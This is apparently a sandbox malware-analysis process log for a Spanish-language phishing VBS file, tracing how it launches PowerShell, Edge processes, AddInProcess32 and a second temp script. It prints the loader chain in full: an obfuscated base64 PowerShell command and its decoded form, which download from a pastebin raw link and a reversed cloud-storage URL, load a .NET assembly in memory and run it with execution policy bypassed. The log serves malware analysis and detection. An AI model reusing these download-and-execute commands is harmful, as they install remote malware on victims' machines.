"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
2⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
2⤵
PID:716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
2⤵
PID:2236

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
2⤵
PID:1764

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
2⤵
PID:756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
2⤵
PID:3940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
2⤵
PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
2⤵
PID:2376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1
2⤵
PID:1164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6060 /prefetch:8
2⤵
PID:1160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
2⤵
PID:112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6376 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1764

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
2⤵
- Checks computer location settings
PID:1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
5⤵
- System Location Discovery: System Language Discovery
PID:5604

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
2⤵
- Checks computer location settings
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
5⤵
- System Location Discovery: System Language Discovery
PID:5540

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
2⤵
- Checks computer location settings
PID:400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"' & exit
6⤵
- System Location Discovery: System Language Discovery
PID:5236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"'
7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"
8⤵
- Checks computer location settings
